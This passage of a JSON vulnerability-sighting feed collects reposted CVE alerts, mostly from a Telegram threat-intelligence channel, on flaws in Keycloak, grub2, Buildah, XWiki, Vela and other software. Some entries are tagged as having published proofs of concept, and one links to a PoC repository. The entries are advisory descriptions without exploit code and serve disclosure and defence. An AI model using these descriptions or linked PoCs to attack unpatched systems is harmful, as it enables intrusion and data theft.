"2025-03-05T21:34:52.000000Z"}, {"uuid": "e77ede52-f3aa-4a91-a931-5d8eea9dd998", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C6WG-CM5X-RQVJ", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/6617", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-25806\n\ud83d\udd25 CVSS Score: 5.3 (cvssV3_0, Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)\n\ud83d\udd39 Description: OpenSearch Security is a plugin for OpenSearch that offers encryption, authentication and authorization. There is an observable discrepancy in the authentication response time between calls where the user provided exists and calls where it does not. This issue only affects calls using the internal basic identity provider (IdP), and not other externally configured IdPs. Patches were released in versions 1.3.9 and 2.6.0, there are no workarounds.\n\ud83d\udccf Published: 2023-03-02T03:04:26.889Z\n\ud83d\udccf Modified: 2025-03-05T21:28:42.975Z\n\ud83d\udd17 References:\n1. https://github.com/opensearch-project/security/security/advisories/GHSA-c6wg-cm5x-rqvj", "creation_timestamp": "2025-03-05T21:34:51.000000Z"}, {"uuid": "d0f29bc9-4bfc-4997-b4fd-b50b984c2228", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:2945", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/6677", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-6717\n\ud83d\udd25 CVSS Score: 6 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:L)\n\ud83d\udd39 Description: A flaw was found in the SAML client registration in Keycloak that could allow an administrator to register malicious JavaScript URIs as Assertion Consumer Service POST Binding URLs (ACS), posing a Cross-Site Scripting (XSS) risk. This issue may allow a malicious admin in one realm or a client with registration access to target users in different realms or applications, executing arbitrary JavaScript in their contexts upon form submission. This can enable unauthorized access and harmful actions, compromising the confidentiality, integrity, and availability of the complete KC instance.\n\ud83d\udccf Published: 2024-04-25T16:02:03.267Z\n\ud83d\udccf Modified: 2025-03-06T13:58:57.474Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1353\n2. https://access.redhat.com/errata/RHSA-2024:1867\n3. https://access.redhat.com/errata/RHSA-2024:1868\n4. https://access.redhat.com/errata/RHSA-2024:2945\n5. https://access.redhat.com/errata/RHSA-2024:4057\n6. https://access.redhat.com/security/cve/CVE-2023-6717\n7. https://bugzilla.redhat.com/show_bug.cgi?id=2253952", "creation_timestamp": "2025-03-06T15:10:49.000000Z"}, {"uuid": "9d2ac284-9399-423d-ba46-9a6e4122f515", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1868", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/6677", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-6717\n\ud83d\udd25 CVSS Score: 6 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:L)\n\ud83d\udd39 Description: A flaw was found in the SAML client registration in Keycloak that could allow an administrator to register malicious JavaScript URIs as Assertion Consumer Service POST Binding URLs (ACS), posing a Cross-Site Scripting (XSS) risk. This issue may allow a malicious admin in one realm or a client with registration access to target users in different realms or applications, executing arbitrary JavaScript in their contexts upon form submission. This can enable unauthorized access and harmful actions, compromising the confidentiality, integrity, and availability of the complete KC instance.\n\ud83d\udccf Published: 2024-04-25T16:02:03.267Z\n\ud83d\udccf Modified: 2025-03-06T13:58:57.474Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1353\n2. https://access.redhat.com/errata/RHSA-2024:1867\n3. https://access.redhat.com/errata/RHSA-2024:1868\n4. https://access.redhat.com/errata/RHSA-2024:2945\n5. https://access.redhat.com/errata/RHSA-2024:4057\n6. https://access.redhat.com/security/cve/CVE-2023-6717\n7. https://bugzilla.redhat.com/show_bug.cgi?id=2253952", "creation_timestamp": "2025-03-06T15:10:49.000000Z"}, {"uuid": "81e17df6-9d91-4e86-ac45-97d9bd9ecf19", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1353", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/6677", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-6717\n\ud83d\udd25 CVSS Score: 6 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:L)\n\ud83d\udd39 Description: A flaw was found in the SAML client registration in Keycloak that could allow an administrator to register malicious JavaScript URIs as Assertion Consumer Service POST Binding URLs (ACS), posing a Cross-Site Scripting (XSS) risk. This issue may allow a malicious admin in one realm or a client with registration access to target users in different realms or applications, executing arbitrary JavaScript in their contexts upon form submission. This can enable unauthorized access and harmful actions, compromising the confidentiality, integrity, and availability of the complete KC instance.\n\ud83d\udccf Published: 2024-04-25T16:02:03.267Z\n\ud83d\udccf Modified: 2025-03-06T13:58:57.474Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1353\n2. https://access.redhat.com/errata/RHSA-2024:1867\n3. https://access.redhat.com/errata/RHSA-2024:1868\n4. https://access.redhat.com/errata/RHSA-2024:2945\n5. https://access.redhat.com/errata/RHSA-2024:4057\n6. https://access.redhat.com/security/cve/CVE-2023-6717\n7. https://bugzilla.redhat.com/show_bug.cgi?id=2253952", "creation_timestamp": "2025-03-06T15:10:49.000000Z"}, {"uuid": "f7e077c4-22aa-43f2-85bc-7eb0d00a473e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1867", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/6677", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-6717\n\ud83d\udd25 CVSS Score: 6 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:L)\n\ud83d\udd39 Description: A flaw was found in the SAML client registration in Keycloak that could allow an administrator to register malicious JavaScript URIs as Assertion Consumer Service POST Binding URLs (ACS), posing a Cross-Site Scripting (XSS) risk. This issue may allow a malicious admin in one realm or a client with registration access to target users in different realms or applications, executing arbitrary JavaScript in their contexts upon form submission. This can enable unauthorized access and harmful actions, compromising the confidentiality, integrity, and availability of the complete KC instance.\n\ud83d\udccf Published: 2024-04-25T16:02:03.267Z\n\ud83d\udccf Modified: 2025-03-06T13:58:57.474Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1353\n2. https://access.redhat.com/errata/RHSA-2024:1867\n3. https://access.redhat.com/errata/RHSA-2024:1868\n4. https://access.redhat.com/errata/RHSA-2024:2945\n5. https://access.redhat.com/errata/RHSA-2024:4057\n6. https://access.redhat.com/security/cve/CVE-2023-6717\n7. https://bugzilla.redhat.com/show_bug.cgi?id=2253952", "creation_timestamp": "2025-03-06T15:10:49.000000Z"}, {"uuid": "62e0079e-c0be-4543-9dda-c90d0a0bfebb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2521", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/7126", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-0624\n\ud83d\udd25 CVSS Score: 7.6 (cvssV3_1, Vector: CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in grub2. During the network boot process, when trying to search for the configuration file, grub copies data from a user controlled environment variable into an internal buffer using the grub_strcpy() function. During this step, it fails to consider the environment variable length when allocating the internal buffer, resulting in an out-of-bounds write. If correctly exploited, this issue may result in remote code execution through the same network segment grub is searching for the boot information, which can be used to by-pass secure boot protections.\n\ud83d\udccf Published: 2025-02-19T18:23:21.463Z\n\ud83d\udccf Modified: 2025-03-11T10:51:19.072Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2521\n2. https://access.redhat.com/errata/RHSA-2025:2655\n3. https://access.redhat.com/security/cve/CVE-2025-0624\n4. https://bugzilla.redhat.com/show_bug.cgi?id=2346112", "creation_timestamp": "2025-03-11T11:41:56.000000Z"}, {"uuid": "fa281d33-f32c-40c1-9193-bc6c1437aac5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9F95-HHG4-PG4F", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/6615", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-26046\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N)\n\ud83d\udd39 Description: teler-waf is a Go HTTP middleware that provides teler IDS functionality to protect against web-based attacks. In teler-waf prior to version 0.1.1 is vulnerable to bypassing common web attack rules when a specific HTML entities payload is used. This vulnerability allows an attacker to execute arbitrary JavaScript code on the victim's browser and compromise the security of the web application. The vulnerability exists due to teler-waf failure to properly sanitize and filter HTML entities in user input. An attacker can exploit this vulnerability to bypass common web attack threat rules in teler-waf and launch cross-site scripting (XSS) attacks. The attacker can execute arbitrary JavaScript code on the victim's browser and steal sensitive information, such as login credentials and session tokens, or take control of the victim's browser and perform malicious actions. This issue has been fixed in version 0.1.1.\n\n\n\ud83d\udccf Published: 2023-03-02T00:14:57.196Z\n\ud83d\udccf Modified: 2025-03-05T21:30:47.218Z\n\ud83d\udd17 References:\n1. https://github.com/kitabisa/teler-waf/security/advisories/GHSA-9f95-hhg4-pg4f\n2. https://github.com/kitabisa/teler-waf/commit/d1d49cfddfa3ec2adad962870f14b85cd1aaf739\n3. https://github.com/kitabisa/teler-waf/releases/tag/v0.1.1", "creation_timestamp": "2025-03-05T21:34:49.000000Z"}, {"uuid": "06557c05-14d3-4b33-bd16-8c712906b53c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8675", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/7100", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9675\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Buildah. Cache mounts do not properly validate that user-specified paths for the cache are within our cache directory, allowing a `RUN` instruction in a Container file to mount an arbitrary directory from the host (read/write) into the container as long as those files can be accessed by the user running Buildah.\n\ud83d\udccf Published: 2024-10-09T14:32:11.922Z\n\ud83d\udccf Modified: 2025-03-11T02:12:22.139Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:8563\n2. https://access.redhat.com/errata/RHSA-2024:8675\n3. https://access.redhat.com/errata/RHSA-2024:8679\n4. https://access.redhat.com/errata/RHSA-2024:8686\n5. https://access.redhat.com/errata/RHSA-2024:8690\n6. https://access.redhat.com/errata/RHSA-2024:8700\n7. https://access.redhat.com/errata/RHSA-2024:8703\n8. https://access.redhat.com/errata/RHSA-2024:8707\n9. https://access.redhat.com/errata/RHSA-2024:8708\n10. https://access.redhat.com/errata/RHSA-2024:8709\n11. https://access.redhat.com/errata/RHSA-2024:8846\n12. https://access.redhat.com/errata/RHSA-2024:8984\n13. https://access.redhat.com/errata/RHSA-2024:8994\n14. https://access.redhat.com/errata/RHSA-2024:9051\n15. https://access.redhat.com/errata/RHSA-2024:9454\n16. https://access.redhat.com/errata/RHSA-2024:9459\n17. https://access.redhat.com/errata/RHSA-2025:2449\n18. https://access.redhat.com/security/cve/CVE-2024-9675\n19. https://bugzilla.redhat.com/show_bug.cgi?id=2317458", "creation_timestamp": "2025-03-11T02:40:08.000000Z"}, {"uuid": "48753227-1678-4fff-a1a8-cefcd88b590b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:8984", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/7100", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-9675\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A vulnerability was found in Buildah. Cache mounts do not properly validate that user-specified paths for the cache are within our cache directory, allowing a `RUN` instruction in a Container file to mount an arbitrary directory from the host (read/write) into the container as long as those files can be accessed by the user running Buildah.\n\ud83d\udccf Published: 2024-10-09T14:32:11.922Z\n\ud83d\udccf Modified: 2025-03-11T02:12:22.139Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:8563\n2. https://access.redhat.com/errata/RHSA-2024:8675\n3. https://access.redhat.com/errata/RHSA-2024:8679\n4. https://access.redhat.com/errata/RHSA-2024:8686\n5. https://access.redhat.com/errata/RHSA-2024:8690\n6. https://access.redhat.com/errata/RHSA-2024:8700\n7. https://access.redhat.com/errata/RHSA-2024:8703\n8. https://access.redhat.com/errata/RHSA-2024:8707\n9. https://access.redhat.com/errata/RHSA-2024:8708\n10. https://access.redhat.com/errata/RHSA-2024:8709\n11. https://access.redhat.com/errata/RHSA-2024:8846\n12. https://access.redhat.com/errata/RHSA-2024:8984\n13. https://access.redhat.com/errata/RHSA-2024:8994\n14. https://access.redhat.com/errata/RHSA-2024:9051\n15. https://access.redhat.com/errata/RHSA-2024:9454\n16. https://access.redhat.com/errata/RHSA-2024:9459\n17. https://access.redhat.com/errata/RHSA-2025:2449\n18. https://access.redhat.com/security/cve/CVE-2024-9675\n19. https://bugzilla.redhat.com/show_bug.cgi?id=2317458", "creation_timestamp": "2025-03-11T02:40:08.000000Z"}, {"uuid": "6b74f0bb-c730-4d09-8745-9f0adaff8c60", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5CF8-VRR8-8HJM", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/6619", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-26476\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: XWiki Platform is a generic wiki platform. Starting in version 3.2-m3, users can deduce the content of the password fields by repeated call to `LiveTableResults` and `WikisLiveTableResultsMacros`. The issue can be fixed by upgrading to versions 14.7-rc-1, 13.4.4, or 13.10.9 and higher, or in version &gt;= 3.2M3 by applying the patch manually on `LiveTableResults` and `WikisLiveTableResultsMacros`.\n\ud83d\udccf Published: 2023-03-02T18:02:20.328Z\n\ud83d\udccf Modified: 2025-03-05T21:24:50.665Z\n\ud83d\udd17 References:\n1. https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-5cf8-vrr8-8hjm\n2. https://github.com/xwiki/xwiki-platform/commit/7f8825537c9523ccb5051abd78014d156f9791c8\n3. https://jira.xwiki.org/browse/XWIKI-19949", "creation_timestamp": "2025-03-05T21:34:53.000000Z"}, {"uuid": "9f80943d-3bd6-454e-b9e4-330a3d987f5d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VC67-62V5-8CWX", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/6736", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27600\n\ud83d\udd25 CVSS Score: 6.9 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N)\n\ud83d\udd39 Description: FastGPT is a knowledge-based platform built on the LLMs. Since the web crawling plug-in does not perform intranet IP verification, an attacker can initiate an intranet IP request, causing the system to initiate a request through the intranet and potentially obtain some private data on the intranet. This issue is fixed in 4.9.0.\n\ud83d\udccf Published: 2025-03-06T19:05:59.684Z\n\ud83d\udccf Modified: 2025-03-06T19:05:59.684Z\n\ud83d\udd17 References:\n1. https://github.com/labring/FastGPT/security/advisories/GHSA-vc67-62v5-8cwx", "creation_timestamp": "2025-03-06T19:38:22.000000Z"}, {"uuid": "68dc98a7-7250-47a2-b10d-cc213852df9c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9M63-33Q3-XQ5X", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7043", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27616\n\ud83d\udd25 CVSS Score: 8.6 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: Vela is a Pipeline Automation (CI/CD) framework built on Linux container technology written in Golang. Prior to versions 0.25.3 and 0.26.3, by spoofing a webhook payload with a specific set of headers and body data, an attacker could transfer ownership of a repository and its repo level secrets to a separate repository. These secrets could be exfiltrated by follow up builds to the repository. Users with an enabled repository with access to repo level CI secrets in Vela are vulnerable to the exploit, and any user with access to the CI instance and the linked source control manager can perform the exploit. Versions 0.25.3 and 0.26.3 fix the issue. No known workarounds are available.\n\ud83d\udccf Published: 2025-03-10T18:56:14.537Z\n\ud83d\udccf Modified: 2025-03-10T18:56:14.537Z\n\ud83d\udd17 References:\n1. https://github.com/go-vela/server/security/advisories/GHSA-9m63-33q3-xq5x\n2. https://github.com/go-vela/server/commit/257886e5a3eea518548387885894e239668584f5\n3. https://github.com/go-vela/server/commit/67c1892e2464dc54b8d2588815dfb7819222500b\n4. https://github.com/go-vela/server/releases/tag/v0.25.3\n5. https://github.com/go-vela/server/releases/tag/v0.26.3", "creation_timestamp": "2025-03-10T19:38:38.000000Z"}, {"uuid": "99beea4c-43b2-4934-a73f-6d5f1d8b5c70", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WPPF-GQJ5-FC4F", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/6774", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27411\n\ud83d\udd25 CVSS Score: 5.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N)\n\ud83d\udd39 Description: REDAXO is a PHP-based CMS. In Redaxo before 5.18.3, the mediapool/media page is vulnerable to arbitrary file upload. This vulnerability is fixed in 5.18.3.\n\ud83d\udccf Published: 2025-03-05T15:42:29.888Z\n\ud83d\udccf Modified: 2025-03-06T22:00:09.152Z\n\ud83d\udd17 References:\n1. https://github.com/redaxo/redaxo/security/advisories/GHSA-wppf-gqj5-fc4f\n2. https://github.com/redaxo/redaxo/commit/3b2159bb45da0ab6cfaef5c8cf8b602ee5e2fb37", "creation_timestamp": "2025-03-06T22:33:44.000000Z"}, {"uuid": "c1ac6916-ffc8-4127-a52c-36b61e464e24", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4057", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/6677", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-6717\n\ud83d\udd25 CVSS Score: 6 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:L)\n\ud83d\udd39 Description: A flaw was found in the SAML client registration in Keycloak that could allow an administrator to register malicious JavaScript URIs as Assertion Consumer Service POST Binding URLs (ACS), posing a Cross-Site Scripting (XSS) risk. This issue may allow a malicious admin in one realm or a client with registration access to target users in different realms or applications, executing arbitrary JavaScript in their contexts upon form submission. This can enable unauthorized access and harmful actions, compromising the confidentiality, integrity, and availability of the complete KC instance.\n\ud83d\udccf Published: 2024-04-25T16:02:03.267Z\n\ud83d\udccf Modified: 2025-03-06T13:58:57.474Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1353\n2. https://access.redhat.com/errata/RHSA-2024:1867\n3. https://access.redhat.com/errata/RHSA-2024:1868\n4. https://access.redhat.com/errata/RHSA-2024:2945\n5. https://access.redhat.com/errata/RHSA-2024:4057\n6. https://access.redhat.com/security/cve/CVE-2023-6717\n7. https://bugzilla.redhat.com/show_bug.cgi?id=2253952", "creation_timestamp": "2025-03-06T15:10:49.000000Z"}, {"uuid": "74060f20-46a4-48b1-8492-13436b5405a3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J7P3-V652-P3GF", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/6765", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-25191\n\ud83d\udd25 CVSS Score: 6.9 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N)\n\ud83d\udd39 Description: Group-Office is an enterprise CRM and groupware tool. This Stored XSS vulnerability exists where user input in the Name field is not properly sanitized before being stored. This vulnerability is fixed in 6.8.100.\n\ud83d\udccf Published: 2025-03-06T18:41:00.761Z\n\ud83d\udccf Modified: 2025-03-06T20:35:12.106Z\n\ud83d\udd17 References:\n1. https://github.com/Intermesh/groupoffice/security/advisories/GHSA-j7p3-v652-p3gf\n2. https://github.com/Intermesh/groupoffice/commit/c5c83e19a5cdf93b0e758726c97597861f1d6eda", "creation_timestamp": "2025-03-06T21:34:36.000000Z"}, {"uuid": "3ff67c5b-3ac8-4942-93b8-ed16492d7873", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-37CP-FGQ5-7WC2", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/40618", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aCVE-2025-32433 https://github.com/erlang/otp/security/advisories/GHSA-37cp-fgq5-7wc2\nURL\uff1ahttps://github.com/byteReaper77/CVE-2025-2783-SandboxEscape\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-06-16T01:38:12.000000Z"}, {"uuid": "9014bfe9-e262-4a54-a8bd-c31f56199abc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VVJV-97J8-94XH", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/6732", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-22738\n\ud83d\udd25 CVSS Score: 6.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N)\n\ud83d\udd39 Description: vantage6 is a privacy preserving federated learning infrastructure for secure insight exchange. Assigning existing users to a different organizations is currently possible. It may lead to unintended access: if a user from organization A is accidentally assigned to organization B, they will retain their permissions and therefore might be able to access stuff they should not be allowed to access. This issue is patched in version 3.8.0.\n\ud83d\udccf Published: 2023-03-01T20:22:13.113Z\n\ud83d\udccf Modified: 2025-03-06T19:07:40.465Z\n\ud83d\udd17 References:\n1. https://github.com/vantage6/vantage6/security/advisories/GHSA-vvjv-97j8-94xh\n2. https://github.com/vantage6/vantage6/commit/798aca1de142a4eca175ef51112e2235642f4f24", "creation_timestamp": "2025-03-06T19:38:16.000000Z"}, {"uuid": "0da8825b-a95a-47c2-9ea1-0264bb5c6927", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4JJQ-VGQP-QW45", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/6763", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-24796\n\ud83d\udd25 CVSS Score: 6.3 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: Collabora Online is a collaborative online office suite based on LibreOffice. Macro support is disabled by default in Collabora Online, but can be enabled by an administrator. Collabora Online typically hosts each document instance within a jail and is allowed to download content from locations controlled by the net.lok_allow configuration option, which by default include the private IP ranges to enable access to the local network. If enabled, macros were allowed run executable binaries. By combining an ability to host executables, typically in the local network, in an allowed accessible location, with a macro enabled Collabora Online, it was then possible to install arbitrary binaries within the jail and execute them. These executables are restricted to the same jail file system and user as the document instance but can be used to bypass the additional limits on what network hosts are accessible and provide more flexibility as a platform for further attempts. This is issue is fixed in 24.04.12.4, 23.05.19, 22.05.25 and later macros.\n\ud83d\udccf Published: 2025-03-06T18:37:32.268Z\n\ud83d\udccf Modified: 2025-03-06T20:37:41.914Z\n\ud83d\udd17 References:\n1. https://github.com/CollaboraOnline/online/security/advisories/GHSA-4jjq-vgqp-qw45", "creation_timestamp": "2025-03-06T21:34:34.000000Z"}, {"uuid": "ab6e72fa-34bf-4dbd-b499-556abfb3f412", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MF24-CHXH-HMVJ", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/6767", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-25294\n\ud83d\udd25 CVSS Score: 5.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)\n\ud83d\udd39 Description: Envoy Gateway is an open source project for managing Envoy Proxy as a standalone or Kubernetes-based application gateway. In all Envoy Gateway versions prior to 1.2.7 and 1.3.1 a default Envoy Proxy access log configuration is used. This format is vulnerable to log injection attacks. If the attacker uses a specially crafted user-agent which performs json injection, then he could add and overwrite fields to the access log. This vulnerability is fixed in 1.3.1 and 1.2.7. One can overwrite the old text based default format with JSON formatter by modifying the \"EnvoyProxy.spec.telemetry.accessLog\" setting.\n\ud83d\udccf Published: 2025-03-06T18:46:23.913Z\n\ud83d\udccf Modified: 2025-03-06T20:34:27.649Z\n\ud83d\udd17 References:\n1. https://github.com/envoyproxy/gateway/security/advisories/GHSA-mf24-chxh-hmvj\n2. https://github.com/envoyproxy/gateway/commit/8f48f5199cf1bbb9a8ac0695c5171bfef6c9198a", "creation_timestamp": "2025-03-06T21:34:37.000000Z"}, {"uuid": "20d420fd-7012-4170-b9a6-a7edfb63f05e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G7CG-7GW9-V8CF", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/7115", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-2174\n\ud83d\udd25 CVSS Score: 6.9 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: A vulnerability was found in libzvbi up to 0.2.43. It has been declared as problematic. Affected by this vulnerability is the function vbi_strndup_iconv_ucs2 of the file src/conv.c. The manipulation of the argument src_length leads to integer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 0.2.44 is able to address this issue. The patch is named ca1672134b3e2962cd392212c73f44f8f4cb489f. It is recommended to upgrade the affected component. The code 